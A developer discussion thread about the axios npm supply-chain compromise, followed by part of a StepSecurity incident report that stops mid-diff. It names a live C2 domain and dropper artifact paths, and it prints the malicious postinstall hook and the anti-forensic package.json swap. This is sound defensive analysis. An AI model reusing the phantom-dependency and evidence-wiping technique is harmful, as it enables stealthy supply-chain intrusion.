You should probably set your default to not run those scripts. They are mostly unnecessary.
~/.npmrc :
ignore-scripts=true
83M weekly downloads!The anti-forensics here are much more complicated that I had imagined. Sahring after getting my hands burned.
After the RAT deploys, setup.js deletes itself and swaps package.json with a clean stub. Your node_modules looks fine. Only way to know is checking for artifacts: /Library/Caches/com.apple.act.mond on mac, %PROGRAMDATA%\wt.exe on windows, /tmp/ld.py on linux. Or grep network logs for sfrclak.com.
Somehow noboady is worried about how agentic coding tools run npm install autonomously. No human in the loop to notice a weird new transitive dep. That attack surface is just getting worsened day by day.
Website: https://asfaload.com/
Also from the report:
> Neither malicious version contains a single line of malicious code inside axios itself. Instead, both inject a fake dependency, plain-crypto-js@4.2.1, a package that is never imported anywhere in the axios source, whose only purpose is to run a postinstall script that deploys a cross-platform remote access trojan (RAT)
Good news for pnpm/bun users who have to manually approve postinstall scripts.
I also have `ignore-scripts=true` in my ~/.npmrc. Based on the analysis, that alone would have mitigated the vulnerability. bun and pnpm do not execute lifecycle scripts by default.
Here's how to set global configs to set min release age to 7 days:
~/.config/uv/uv.toml
exclude-newer = "7 days"
~/.npmrc
min-release-age=7 # days
ignore-scripts=true
~/Library/Preferences/pnpm/rc
minimum-release-age=10080 # minutes
~/.bunfig.toml
[install]
minimumReleaseAge = 604800 # seconds
(Side note, it's wild that npm, bun, and pnpm have all decided to use different time units for this configuration.)If you're developing with LLM agents, you should also update your AGENTS.md/CLAUDE.md file with some guidance on how to handle failures stemming from this config as they will cause the agent to unproductively spin its wheels.
I have bwrap configured to override: npm, pip, cargo, mvn, gradle, everything you can think of and I only give it the access it needs, strip anything that is useless to it anyway, deny dbus, sockets, everything. SSH is forwarded via socket (ssh-add).
This limits the blast radius to your CWD and package manager caches and often won't even work since the malware usually expects some things to be available which are not in a permissionless sandbox.
You can think of it as running a docker container, but without the requirement of having to have an image. It is the same thing flatpak is based on.
As for server deployments, container hardening is your friend. Most supply chain attacks target build scripts so as long as you treat your CI/CD as an untrusted environment you should be good - there's quite a few resources on this so won't go into detail.
Bonus points: use the same sandbox for AI.
Stay safe out there.
It’s things like this that make me want to swap to Qubes permanently, simply as to not have my password manager in the same context as compiling software ever.
— Run Yarn in zero-installs mode (or equivalent for your package manager). Every new or changed dependency gets checked in.
— Disable post-install scripts. If you don’t, at least make sure your package manager prompts for scripts during install, in which case you stop and look at what it’s going to run.
— If third-party code runs in development, including post-install scripts, try your best to make sure it happens in a VM/container.
— Vet every package you add. Popularity is a plus, recent commit time is a minus: if you have this but not that, keep your eyes peeled. Skim through the code on NPM (they will probably never stop labelling it as “beta”), commit history and changelog.
— Vet its dependency tree. Dependencies is a vector for attack on you and your users, and any new developer in the tree is another person you’re trusting to not be malicious and to take all of the above measures, too.
We have libraries like SQLite, which is a single .c file that you drag into your project and it immediately does a ton of incredibly useful, non-trivial work for you, while barely increasing your executable's size.
The issue is not dependencies themselves, it's transitive ones. Nobody installs left-pad or is-even-number directly, and "libraries" like these are the vast majority of the attack surface. If you get rid of transitive dependencies, you get rid of the need of a package manager, as installing a package becomes unzipping a few files into a vendor/ folder.
There's so many C libraries like this. Off the top of my head, SQLite, FreeType, OpenSSL, libcurl, libpng/jpeg, stb everything, zlib, lua, SDL, GLFW... I do game development so I'm most familiar with the ones commonly used in game engines, but I'm sure other fields have similarly high quality C libraries.
They also bindings for every language under the sun. Rust libraries are very rarely used outside of Rust, and C#/Java/JS/Python libraries are never used outside their respective language (aside form Java ones in other JVM langs).
All it takes is an `npm config set` to switch registries anyways. The hard part is having a central party that is able to convince all the various security companies to collaborate rather than having dozens of different registries each from each company.
Rather than just a hard-coded delay, I think having policies on what checks must pass first makes sense with overrides for when CVEs show up.
(WIP)
This is why corporations doing it right don't allow installing the Internet into dev machines.
Yet everyone gets to throw their joke about PC virus, while having learnt nothing from it.
Now, I tend to use Python, Rust and Julia. With Python I am constantly using few same packages like numpy and matplotlib. With Rust and Julia, I try as much as possible to not use any packages at all, because it always scares me when something that should be pretty simple downloads half of the Internet to my PC.
Julia is even worse than Rust in that regard - for even rudimentary stuff like static arrays or properly namespaced enums people download 3rd party packages.
Edit: bottom line is installs are gonna get SOOO much more complicated. You can already see the solution surface... Cooling periods, maintainer profiling, sandbox detonation, lockfile diffing, weird publish path checks. All adds up to one giant PITA for fast easy dev.
For anyone wondering, you need to be on npm >= 11.10.0 in order to use it. It just became available Feb 11 2026
Idk, lockfiles provide almost as good protection without putting the binaries in git. At least with `--frozen-lockfile` option.
My feelings precisely. Min package age (supported in uv and all JS package managers) is nice but I still feel extremely hesitant to upgrade my deps or start a new project at the moment.
I don’t think this is going to stabilize any time soon, so figuring out how to handle potentially compromised deps is something we will all need to think about.
1. Packages should carry a manifest that declares what they do at build time, just like Chrome extensions do. This manifest would then be used to configure its build environment.
2. Publishers to official registries should be forced to use 2FA. I proposed this a decade ago for crates.io and people lost their minds, like I was suggesting we drag developers to a shed to be shot.
3. Every package registry should produce a detailed audit log that contains a "who, what, when". Every build/ command should be producing audit logs that can be collected by endpoint agents too.
4. Every package registry should support TUF.
5. Typosquatting defenses should be standard.
etc etc etc. Some of this is hard, some of this is not hard. All of this is possible. No one has done it, so it's way too early to say "package managers can't be made safe" when no one has tried.
What is a problem is library quality. Which is downstream of nobody getting paid for it, combined with an optimistic but unrealistic "all packages are equal" philosophy.
> High quality C libraries
> OpenSSL
OpenSSL is one of the ones where there's a ground up rewrite happening because the code quality is so terrible while being security critical.
On the other end, javascript is uniquely bad because of the deployment model and difficulty of adding things to the standard library, so everything is littered with polyfills.
I'm not sure why you believe this is more secure than a package manager. At least with a package manager there is an opportunity for vetting. It's also trivial that it did not increase your executable's size. If your executable depends on it, it increases its effective size.
A much better approach would be to pin the versions used and do intentional updates some time after release, say a sprint after.
And with LLMs generating more and more code, the risk of copying old setups increases.
People are lazy. And sometimes they find old stuff via a google search and use that.
Given how HTTP is now what TCP was during the 90s and almost all modern networked applications needing to communicate in it one way or another, most rust projects come with an inherent security risk.
These days, I score the usability of programming languages by how complete their standard library is. By that measure, Rust and Javascript get an automatic F.
Doesn’t npm mandate 2FA as of some time last year? How was that bypassed?
Fetch wasn't added to Node.js as a core package until version 18, and wasn't considered stable until version 21. Axios has been around much longer and was made part of popular frameworks and tutorials, which helps continue to propagate it's usage.
Would they not have approved it for earlier versions? But also wouldn't the chance of addition automatic approval be high (for such a widely used project)?
First day with javascript?
If no one checks their dependencies, the solution is to centralize this responsibility at the package repository. Something like left-pad should simply not be admitted to npm. Enforce a set of stricter rules which only allow non-trivial packages maintained by someone who is clearly accountable.
Another change one could make is develop bigger standard libraries with all the utilities which are useful. For example in Rust there are a few de facto standard packages one needs very often, which then also force you to pull in a bunch of transitive dependencies. Those could also be part of the standard library.
This all amounts to increasing the minimal scope of useful functionality a package has to have to be admitted and increasing accountability of the people maintaining them. This obviously comes with more effort on the maintainers part, but hey maybe we could even pay them for their labor.
But maybe that's not the right fit either. The world where package managers are just open to whatever needs to die. It's no longer a safe model.
It's also a little context dependent, for example if I was using Axios and I see a prompt to run the plain-crypto-js postinstall script, alarm bells would instantly ring, which would at least make me look up the changelog to see why this is happening.
In most cases I don't even let them run unless something breaks/doesn't work as expected.
~/.yarnrc.yml
npmMinimalAgeGate: "3d"Unfortunately npm is friggen awful at this...
You can use --ignore-scripts=true to disable all scripts, but inevitably, some packages will absolutely need to run scripts. There's no way to allowlist specific scripts to run, while blocking all others.
There are third-party npm packages that you can install, like @lavamoat/allow-scripts, but to use these you need to use an entirely different command like `npm setup` instead of the `npm install` everyone is familiar with.
This is just awful in so many ways, and it'd be so easy for npm to fix.
There are pretty much exactly 3000 deleted issues, with the range starting at https://github.com/axios/axios/issues/7547 (7547) and ending at https://github.com/axios/axios/issues/10546 (10546 which is 7547+2999)
Maybe just a coincidence but they have cubic-dev-ai edit every single PR with a summary. And that bot edits PR descriptions even for outside contributors.
I'm not dogmatic about the whole "JS for the backend is sin" from backend folks, but it seems like it was the right call. You should stick to large org backed packages, or languages with good enough standard libraries, like Go, Java, Python, C#.
I wrongly thought that the verified provenance UI showed a package has a trusted publishing pipeline, but seems it’s orthogonal.
NPM really needs to move away from these secrets that can be stolen.
Another obvious ChatGPT-ism. The fact that people are using AI to write these security posts doesn't surprise me, but the fact they use it to write a verbose article with spicy little snippets that LLMs seem to prefer does make it really hard to appreciate anything other than the simple facts in the article.
Yet another case in point for "do your own writing" (https://news.ycombinator.com/item?id=47573519)
Project: https://point-wild.github.io/who-touched-my-packages/
That way, I can at least limit the blast radius when (not if) I catch an infostealer.
However, it’s an extra line of defence against
1) your registry being down (preventing you from pushing a security hotfix when you find out another package compromised your product),
2) package unpublishing attacks (your install step fails or asks you to pick a replacement version, what do you do at 5pm on a Friday?), and
3) possibly (but haven’t looked in depth) lockfile poisoning attacks, by making them more complicated.
Also, it makes the size of your dependency graph (or changes therein) much more tangible and obvious, compared to some lines in a lockfile.
https://github.com/npm/cli/pull/8965
https://github.com/npm/cli/issues/8994
Its good that that they finally got there but....
I would be avoiding npm itself on principle in the JS ecosystem. Use a package manager that has a history of actually caring about these issues in a timely manner.
(Of course I could still get bitten if one of the packages I trust has its postinstall script replaced.)
Absolute nonsense. What does automated world even mean? Even if one could infer reasonably, it's no justification. Appealing to "the real world" in lieu of any further consideration is exactly the kind of mindlessness that has led to the present state of affairs.
Automation of dependency versions was never something we needed it was always a convenience, and even that's a stretch given that dependency hell is abundant in all of these systems, and now we have supply chain attacks. While everyone is welcome to do as they please, I'm going to stick to vendoring my dependencies, statically compiling, and not blindly trusting code I haven't seen before.
This is what happens when there is no barrier to entry and it includes everyone who has no idea what they are doing in charge of the NPM community.
When you see a single package having +25 dependencies, that is a bad practice and increases the risk of supply chain attacks.
Most of them don't even pin their dependencies and I called this out just yesterday on OneCLI. [0]
It just happens that NPM is the worst out of all of the rest of the ecosystems due to the above.
That model effectively becomes your ring 1. Ring 0 is the stdlib and the package manager itself, and - because you would always need to be able to step outside the distribution for either freshness or "that's not been picked up by the distro yet" reasons - the ecosystem package repositories are the wild west ring 2.
In the language ecosystems I'm only aware of Quicklisp/Ultralisp and Haskell's Stackage that work like this. Everything else is effectively a rolling distro that hasn't realised that's what it is yet.
You are just swapping a package manager with security by obscurity by copy pasting code into your project. It is arguably a much worse way of handling supply chain security, as now there is no way to audit your dependencies.
> If you get rid of transitive dependencies, you get rid of the need of a package manager
This argument makes no sense. Obviously reducing the amount of transitive dependencies is almost always a good thing, but it doesn't change the fundamental benefits of a package manager.
> There's so many C libraries like this
The language with the most fundamental and dangerous ways of handling memory, the language that is constantly in the news for numerous security problems even in massively popular libraries such as OpenSSL? Yes, definitely copy-paste that code in, surely nothing can go wrong.
> They also bindings for every language under the sun. Rust libraries are very rarely used outside of Rust
This is a WILD assumption, doing C-style bindings is actually quite common. YOu will of course then also be exposing a memory unsafe interface, as that is what you get with C.
What exactly is your argument here? It feels like what you are trying to say is that we should just stop doing JS and instead all make C programs that copy paste massive libraries because that is somhow 'high quality'.
This seems like a massively uninformed, one-sided and frankly ridiculous take.
These are so much better than the interface fetch offers you, unfortunately.
Maybe I misunderstood this point. But the ssh socket also gives access to your private keys, so I see no security gain in that point. Better to have a password protected key.
Axios has like 100M downloads per week. A couple of people with MFA should have to approve changes before it gets published.
- copy the dependencies' tests into your own tests
- copy the code in to your codebase as a library using the same review process you would for code from your own team
- treat updates to the library in the same way you would for updates to your own code
Apparently, this extra work will now not be a problem, because we have AI making us 10x more efficient. To be honest, even without AI, we should've been doing this from the start, even if I understand why we haven't. The excuses are starting to wear thin though.
The solution to this is twofold, and is already implemented in the primary ecosystems being targeted (Python and JS): packagers should use Trusted Publishing to eliminate the need for long lived release credentials, and downstreams should use cooldowns to give security researchers time to identify and quarantine attacks.
(Security is a moving target, and neither of these techniques is going to work indefinitely without new techniques added to the mix. But they would be effective against the current problems we’re seeing.)
I've been working on Proof of Resilience, a set of 4 metrics for OSS, and using that as a scoring oracle for what to fund.
Popularity metrics like downloads, stars, etc are easy to fake today with ai agents. An interesting property is that gaming these metrics produces better code, not worse.
These are the 4 metrics:
1. Build determinism - does the published artifact match a reproducible build from source?
2. Fuzzing survival - does the package survive fuzz testing?
3. Downstream stability - does it break any repos dependent on this project when pushing a release?
4. Patch velocity - how fast are fixes merged?
Here's a link to the post, still early but would appreciate any feedback.
What a great time to be alive! Now, that's exactly why I enjoy writing software with minimal dependencies for myself (and sometimes for my family and friends) in my spare time - first, it's fun, and second, turns out it's more secure.
I just wish it had more human interaction rather than have a GenAI spit out the blog post. It's very repetitive and includes several EM dashes.
If your first party tooling contains all the functionality you typically need, it's possible you can be productive with zero 3rd party dependencies. In practice you will tend to have a few, but you won't be vendoring out critical things like HTTP, TCP, JSON, string sanitation, cryptography. These are beacons for attackers. Everything depends on this stuff so the motivation for attacking these common surfaces is high.
I can literally count on one hand the number of 3rd party dependencies I've used in the last year. Dapper is the only regular thing I can come up with. Sometimes ScottPlot. Both of my SQL providers (MSSQL and SQLite) are first party as well. This is a major reason why they're the only sql providers I use.
Maybe I am just so traumatized from compliance and auditing in regulated software business, but this feels like a happier way to build software too. My tools tend to stay right where I left them the previous day. I don't have to worry about my hammer or screw drivers stealing all my bitcoin in the middle of the night.
Dealing with dependencies is another question; if it's stupid stuff like leftpad then it should be either vendored in or promoted to be a language feature anyway (as it has been).
This needs to be done (as we've seen from these recent attacks) in your devenv, ci/cd and prod environments. Not one, or two, but all of these environments.
The easiest way is via using something like kubernetes network policies + a squid proxy to allow limited trusted domains through, and those domains must not be publicly controllable by attackers. ie. github.com is not safe to allow, but raw.githubusercontent.com would be as it doesn't allow data to be submitted to it.
Network firewalls that perform SSL interception and restrict DNS queries are an option also, though more complicated or expensive than the above.
This stops both DNS exfil and HTTP exfil. For your devenv, software like Little Snitch may protect your from these (I'm not 100% on DNS exfil here though). Otherwise run your devenv (ie vscode) as a web server, or containerised + vnc, a VM, etc, with the same restrictions.
Wouldn’t that just encourage the bad actors to delay the activation of their payloads a few days or even remotely activated on a switch?
find / -path '*/node_modules/axios/package.json' -type f 2>/dev/null | while read -l f; set -l v (grep -oP '"version"\s*:\s\*"\K(1\.14\.1|0\.30\.4)' $f 2>/dev/null); if test -n "$v"; printf '\a\n\033[1;31m FOUND v%s\033[0m \033[1;33m%s\033[0m\n' $v (string replace '/package.json' '' -- $f); else; printf '\r\033[2m scanning: %s\033[K\033[0m' (string sub -l 70 -- $f); end; end; printf '\r\033[K\n\033[1;32m scan complete\033[0m\n'Zero deps. One file. Already detects the hijacked maintainer email on the current safe version.
github.com/nfodor/npm-supply-chain-audit
Because axios existed before the builtin fetch, and so there's a lot of stackoverflow answers explaining how to use fetch, and the llm models are trained on that, so they will write axios requests instead of fetch
You can remember this answer for every time you ask same question again:
"Coz whatever else/builtin was before was annoying enough for common use cases"
7 days gives ample time for security scanning, too.
Which will never even come close to happening, unless npm decides to make it the default, which they won't.
~/.npmrc
min-release-age=7 # days
actually doesn't set it at all, please edit your comment.EDIT: Actually maybe it does? But it's weird because
`npm config list -l` shows: `min-release-age = null` with, and without the comment. so who knows ¯\_(ツ)_/¯
GB's of libre software, graphical install, 2.6 kernel, KDE3 desktop, very light on my Athlon 2000 with 256MB of RAM. It was incredible compared to what you got with Windows XP and 120 Euro per seat. Nonfree software and almost empty.
And, well, if for instance I could get read only, ~16TB durable USB drive with tons of Guix packages offline (in a two yearly basis with stable releases) for $200 I would buy them in the spot.
You would say that $200 for a distro it's expensive, but for what it provides, if you are only interested in libre gaming and tools, they amount you save can be huge. I've seen people spend $400 in Steam games because of the Holyday sales...
In general, management was to see progress. I've come to find that technical details like these are an afterthought for most engineers, so far as the deadlines are being met.
It's one of these things that are under the water, tech side jobs. Everyone has to be on board, if your peers don't give a fuck you're just an annoyance and will be swimming counter-current.
With AI agents the volume and frequency of supply chain attacks is going to explode. I think our entire notion of how to develop and distribute software safely needs to change. I don't have answers; "reflections on trusting trust" explains the difficulties we now face.
Also, considering how prevalent TPM/Secure Enclaves are on modern devices, I would guess most package maintainers already have hardware capable of generating/using signing keys that never leave hardware.
I think it is mostly a devex/workflow question.
Considering the recent ci/cd-pipeline compromises, I think it would make sense to make a two phase commit process required for popular packages. Build and upload to the registry from a pipeline, but require a signature from a hardware resident key before making the package available.
Maybe not all users should pull all packages straight from what devs are pushing.
There's no reason we can't have "node package distributions" like we have Linux distributions. Maybe we should stop expecting devs and maintainers and Microsoft to take responsibility for our supply-chain.
There's no community, the users of axios are devs that looked at stackoverflow for "how to download a file in javascript", they barely know or care what axios is.
Now the users of axios are devs that ask Claude Code or Codex to scrape a website or make a dashboard, they don't even know about the word axios.
I personally had to delete axios a couple of time from my codebase when working with junior devs.
You should try writing code, and not relying on libraries for everything, it may change how you look at programming and actually ground your opinions in reality. I'm staring at company's vendor/ folder. It has ~15 libraries, all but one of which operate on trusted input (game assets).
> fundamental benefits of a package manager.
I literally told you why they don't matter if you write code in a sane way.
> doing C-style bindings is actually quite common
I know bindings for Rust libraries exist. Read the literal words you quoted. "Rust libraries are very rarely used outside of Rust". Got some counterexamples?
It's herd immunity, not personal protection. You benefit from the people who DO install immediately and raise the alarm
As a higher-level alternative to bwrap, I sometimes use `flatpak run --filesystem=$PWD --command=bash org.freedesktop.Platform`. This is kind of an abuse of flatpaks but works just fine to make a sandbox. And unlike bwrap, it has sane defaults (no extra permissions, not even network, though it does allow xdg-desktop-portal).
Since the attacker had full control of the NPM account, it is game over - the attacker can login to NPM and could, if they wanted, configure Trusted Publishing on any repo they control.
Axios IS using trusted publishing, but that didn't do anything to prevent the attack since the entire NPM account was taken over and config can be modified to allow publishing using a token.
"it's not just a waste of money — it's a security problem"
I am really passionate about these things, but I am not going to read something which you haven't written. Even sharing a prompt/rough-sketches/raw-writing might be beneficial but I recommend writing it by-hand man, we are all burnt out reading AI slop, I can't read more AI
1. They are not going to include everything. This includes things like new file formats.
2. They are going to be out of date whenever a standard changes (HTML, etc.), application changes (e.g. SQLite/PostgreSQL/etc. for SQL/ORM bindings), or API changes (DirectX, Vulcan, etc.).
3. Things like data structures, graphics APIs, etc. will have performance characteristics that may be different to your use case.
4. They can't cover all nice use cases such as the different libraries and frameworks for creating games of different genres.
For example, Python's XML DOM implementation only implements a subset of XPath and doesn't support parsing HTML.
The fact that Python, Java, and .NET have large library ecosystems proves that even if you have a "Batteries Included" approach there will always be other things to add.
Unless you are Python, where the standard library includes multiple HTTP libraries and everyone installs the requests package anyways.
Few languages have good models for evolving their standard library, so you end up with lots of bad designs sticking around forever. Libraries are much easier to evolve, giving them the advantage in terms of developer UX and performance.
I think packages of a certain size need to be held to higher standards by the repositories. Multiple users should have to approve changes. Maybe enforced scans (though with trivy’s recent compromise that wont be likely any time soon)
Basically anything besides lone developer can decide to send something out on a whim that will run on millions of machines.
I understand why this doesn't work well with legacy projects, but it's something that the language could strive towards.
It's true that system repos doesn't include everything, but you can create your own repositories if you really need to for a few things. In practice Fedora/EPEL are basically sufficient for my needs. Right now I'm deploying something with yocto, which is a bit more limited in slection, but it's pretty easy to add my own packages and it at least has hashes so things don't get replaced without me noticing (to be fair, I don't know if the security practices of open-embedded recipes are as strong as Fedora...).
I kind of feel like the authors here should want that for themselves, before the community would even realize it's needed. I can't say I've worked on packages that are as popular as axios, but once some packages we were publishing hit 10K downloads or so, we all agreed that we needed to up our security posture, and we all got hardware keys for 2FA and spent 1-2 weeks on making sure it was as bullet-proof we could make it.
To be fair, most FOSS is developed by volunteers so I understand not wanting to spend any money on something you provide for free, but on the other hand, I personally wouldn't feel comfortable being responsible for something that popular without hardening my own setup as much as I could, even if it means stopping everything for a week.
Even left-pad is still getting 1.6 million weekly downloads.
fetch('https://api.example.com/data', {
headers: {
'Authorization': 'Bearer ' + accessToken
}
})I don't think there are great solutions here. Arguably, units should be supported by the config file format, but existing config file formats don't do that.
StepSecurity is hosting a community town hall on this incident on April 1st at 10:00 AM PT - Register Here.
axios is the most popular JavaScript HTTP client library with over 100 million weekly downloads. On March 30, 2026, StepSecurity identified two malicious versions of the widely used axios HTTP client library published to npm: axios@1.14.1 and axios@0.30.4. The malicious versions inject a new dependency, plain-crypto-js@4.2.1, which is never imported anywhere in the axios source code. Its sole purpose is to execute a postinstall script that acts as a cross platform remote access trojan (RAT) dropper, targeting macOS, Windows, and Linux. The dropper contacts a live command and control server and delivers platform specific second stage payloads. After execution, the malware deletes itself and replaces its own package.json with a clean version to evade forensic detection.
There are zero lines of malicious code inside axios itself, and that's exactly what makes this attack so dangerous. Both poisoned releases inject a fake dependency, plain-crypto-js@4.2.1, a package never imported anywhere in the axios source, whose sole purpose is to run a postinstall script that deploys a cross-platform remote access trojan. The dropper contacts a live command-and-control server, delivers separate second-stage payloads for macOS, Windows, and Linux, then erases itself and replaces its own package.json with a clean decoy. A developer who inspects their node_modules folder after the fact will find no indication anything went wrong.
This was not opportunistic. It was precision. The malicious dependency was staged 18 hours in advance. Three payloads were pre-built for three operating systems. Both release branches were poisoned within 39 minutes of each other. Every artifact was designed to self-destruct. Within two seconds of npm install, the malware was already calling home to the attacker's server before npm had even finished resolving dependencies. This is among the most operationally sophisticated supply chain attacks ever documented against a top-10 npm package.
These compromises were detected by StepSecurity AI Package Analyst [1][2] and StepSecurity Harden-Runner. We have responsibly disclosed the issue to the project maintainers.
StepSecurity Harden-Runner, whose community tier is free for public repos and is used by over 12,000 public repositories, detected the compromised axios package making anomalous outbound connections to the attacker's C2 domain across multiple open source projects. For example, Harden-Runner flagged the C2 callback to sfrclak.com:8000 during a routine CI run in the backstage repository, one of the most widely used developer portal frameworks. The Backstage team has confirmed that this workflow is intentionally sandboxed and the malicious package install does not impact the project. The connection was automatically marked as anomalous because it had never appeared in any prior workflow run. Harden-Runner insights for community tier projects are public by design, allowing anyone to verify the detection: https://app.stepsecurity.io/github/backstage/backstage/actions/runs/23775668703?tab=network-events

[Community Webinar] axios Compromised on npm: What We Know, What You Should Do
Join StepSecurity on April 1st at 10:00 AM PT for a live community briefing on the axios supply chain attack. We'll walk through the full attack chain, indicators of compromise, remediation steps, and open it up for Q&A.
The attack was pre-staged across roughly 18 hours, with the malicious dependency seeded on npm before the axios releases to avoid “brand-new package” alarms from security scanners:
| Timestamp (UTC) | Event |
|---|---|
| 2026-03-30 05:57 | plain-crypto-js@4.2.0 published by nrwise@proton.me — a clean decoy containing a full copy of the legitimate crypto-js source, no postinstall hook. Its sole purpose is to establish npm publishing history so the package does not appear as a zero-history account during later inspection. |
| 2026-03-30 23:59 | plain-crypto-js@4.2.1 published by nrwise@proton.me — malicious payload added. The postinstall: "node setup.js" hook and obfuscated dropper are introduced. |
| 2026-03-31 00:21 | axios@1.14.1 published by compromised jasonsaayman account (email: ifstap@proton.me) — injects plain-crypto-js@4.2.1 as a runtime dependency, targeting the modern 1.x user base. |
| 2026-03-31 01:00 | axios@0.30.4 published by the same compromised account — identical injection into the legacy 0.x branch, published 39 minutes later to maximize coverage across both release lines. |
| 2026-03-31 ~03:15 | npm unpublishes axios@1.14.1 and axios@0.30.4. Both versions are removed from the registry and the latest dist-tag reverts to 1.14.0. axios@1.14.1 had been live for approximately 2 hours 53 minutes; axios@0.30.4 for approximately 2 hours 15 minutes. Timestamp is inferred from the axios registry document's modified field (03:15:30Z) — npm does not expose a dedicated per-version unpublish timestamp in its public API. |
| 2026-03-31 03:25 | npm initiates a security hold on plain-crypto-js, beginning the process of replacing the malicious package with an npm security-holder stub. |
| 2026-03-31 04:26 | npm publishes the security-holder stub plain-crypto-js@0.0.1-security.0 under the npm@npmjs.com account, formally replacing the malicious package on the registry. plain-crypto-js@4.2.1 had been live for approximately 4 hours 27 minutes. Attempting to install any version of plain-crypto-js now returns the security notice. |
The attacker compromised the jasonsaayman npm account, the primary maintainer of the axios project. The account’s registered email was changed to ifstap@proton.me — an attacker-controlled ProtonMail address. Using this access, the attacker published malicious builds across both the 1.x and 0.x release branches simultaneously, maximizing the number of projects exposed.
Both axios@1.14.1 and axios@0.30.4 are recorded in the npm registry as published by jasonsaayman, making them indistinguishable from legitimate releases at a glance. Both versions were published using the compromised npm credentials of a lead axios maintainer, bypassing the project's normal GitHub Actions CI/CD pipeline.
A critical forensic signal is visible in the npm registry metadata. Every legitimate axios 1.x release is published via GitHub Actions with npm’s OIDC Trusted Publisher mechanism, meaning the publish is cryptographically tied to a verified GitHub Actions workflow. axios@1.14.1 breaks that pattern entirely — published manually via a stolen npm access token with no OIDC binding and no gitHead:
// axios@1.14.0 — LEGITIMATE
"_npmUser": {
"name": "GitHub Actions",
"email": "npm-oidc-no-reply@github.com",
"trustedPublisher": {
"id": "github",
"oidcConfigId": "oidc:9061ef30-3132-49f4-b28c-9338d192a1a9"
}
}
// axios@1.14.1 — MALICIOUS
"_npmUser": {
"name": "jasonsaayman",
"email": "ifstap@proton.me"
// no trustedPublisher, no gitHead, no corresponding GitHub commit or tag
}
There is no commit or tag in the axios GitHub repository that corresponds to 1.14.1. The release exists only on npm. The OIDC token that legitimate releases use is ephemeral and scoped to the specific workflow — it cannot be stolen. The attacker must have obtained a long-lived classic npm access token for the account.
Before publishing the malicious axios versions, the attacker pre-staged plain-crypto-js@4.2.1 from account nrwise@proton.me. This package:
crypto-js with an identical description and repository URL pointing to the legitimate brix/crypto-js GitHub repository"postinstall": "node setup.js" — the hook that fires the RAT dropper on installpackage.json stub in a file named package.md for evidence destruction after executionThe decoy version (4.2.0) was published 18 hours earlier to establish publishing history - a clean package in the registry that makes nrwise look like a legitimate maintainer.
A complete file-level comparison between plain-crypto-js@4.2.0 and plain-crypto-js@4.2.1 reveals exactly three differences. Every other file (all 56 crypto source files, the README, the LICENSE, and the docs) is identical between the two versions:
| File | In 4.2.0 | In 4.2.1 | Change |
|---|---|---|---|
package.json |
no scripts section |
"postinstall": "node setup.js" added |
Modified: weapon added |
setup.js |
Not present | 4.2 KB obfuscated dropper | Added: the RAT dropper |
package.md |
Not present | Clean JSON stub reporting version 4.2.0 |
Added: the anti-forensics cover |
The 56 crypto source files are not just similar; they are bit-for-bit identical to the corresponding files in the legitimate crypto-js@4.2.0 package published by Evan Vosberg. The attacker made no modifications to the cryptographic library code whatsoever. This was intentional: any diff-based analysis comparing plain-crypto-js against crypto-js would find nothing suspicious in the library files and would focus attention on package.json — where the postinstall hook looks, at a glance, like a standard build or setup task.
package.mdThe anti-forensics stub (package.md) deserves particular attention. After setup.js runs, it renames package.md to package.json. The stub reports version 4.2.0 — not 4.2.1:
// Contents of package.md (the clean replacement stub)
{
"name": "plain-crypto-js",
"version": "4.2.0", // ← reports 4.2.0, not 4.2.1 — deliberate mismatch
"description": "JavaScript library of crypto standards.",
"license": "MIT",
"author": { "name": "Evan Vosberg", "url": "http://github.com/evanvosberg" },
"homepage": "http://github.com/brix/crypto-js",
"repository": { "type": "git", "url": "http://github.com/brix/crypto-js.git" },
"main": "index.js",
// No "scripts" key — no postinstall, no test
"dependencies": {}
}
This creates a secondary deception layer. After infection, running npm list in the project directory will report plain-crypto-js@4.2.0 — because npm list reads the version field from the installed package.json, which now says 4.2.0. An incident responder checking installed packages would see a version number that does not match the malicious 4.2.1 version they were told to look for, potentially leading them to conclude the system was not compromised.
# What npm list reports POST-infection (after the package.json swap):
$ npm list plain-crypto-js
myproject@1.0.0
└── plain-crypto-js@4.2.0 # ← reports 4.2.0, not 4.2.1
# but the dropper already ran as 4.2.1
# The reliable check is the DIRECTORY PRESENCE, not the version number:
$ ls node_modules/plain-crypto-js
aes.js cipher-core.js core.js ...
# If this directory exists at all, the dropper ran.
# plain-crypto-js is not a dependency of ANY legitimate axios version.
The difference between the real crypto-js@4.2.0 and the malicious plain-crypto-js@4.2.1 is a single field in package.json:
// crypto-js@4.2.0 (LEGITIMATE — Evan Vosberg / brix)
{
"name": "crypto-js",
"version": "4.2.0",
"description": "JavaScript library of crypto standards.",
"author": "Evan Vosberg",
"homepage": "http://github.com/brix/crypto-js",
"scripts": {
"test": "grunt" // ← no postinstall
}
}
// plain-crypto-js@4.2.1 (MALICIOUS — nrwise@proton.me)
{
"name": "plain-crypto-js", // ← different name, everything else cloned
"version": "4.2.1", // ← version one ahead of the real package
"description": "JavaScript library of crypto standards.",
"author": { "name": "Evan Vosberg" }, // ← fraudulent use of real author name
"homepage": "http://github.com/brix/crypto-js", // ← real repo, wrong package
"scripts": {
"test": "grunt",
"postinstall": "node setup.js" // ← THE ONLY DIFFERENCE. The entire weapon.
}
}
The attacker published axios@1.14.1 and axios@0.30.4 with plain-crypto-js: "^4.2.1" added as a runtime dependency — a package that has never appeared in any legitimate axios release. The diff is surgical: every other dependency is identical to the prior clean version.
Dependency comparison between clean and compromised versions:
When a developer runs npm install axios@1.14.1, npm resolves the dependency tree and installs plain-crypto-js@4.2.1 automatically. npm then executes plain-crypto-js’s postinstall script, launching the dropper.
Phantom dependency: A grep across all 86 files in axios@1.14.1 confirms that plain-crypto-js is never imported or require()’d anywhere in the axios source code. It is added to package.json only to trigger the postinstall hook. A dependency that appears in the manifest but has zero usage in the codebase is a high-confidence indicator of a compromised release.
A complete binary diff between axios@1.14.0 and axios@1.14.1 across all 86 files (excluding source maps) reveals that exactly one file changed: package.json. Every other file — all 85 library source files, type definitions, README, CHANGELOG, and compiled dist bundles — is bit-for-bit identical between the two versions.
# File diff: axios@1.14.0 vs axios@1.14.1 (86 files, source maps excluded)
DIFFERS: package.json
Total differing files: 1
Files only in 1.14.1: (none)
Files only in 1.14.0: (none)
The complete package.json diff:
# --- axios/package.json (1.14.0)
# +++ axios/package.json (1.14.1)
- "version": "1.14.0",
+ "version": "1.14.1",
"scripts": {
"fix": "eslint --fix lib/**/*.js",
- "prepare": "husky"
},
"dependencies": {
"follow-redirects": "^2.1.0",
"form-data": "^4.0.1",
"proxy-from-env": "^2.1.0",
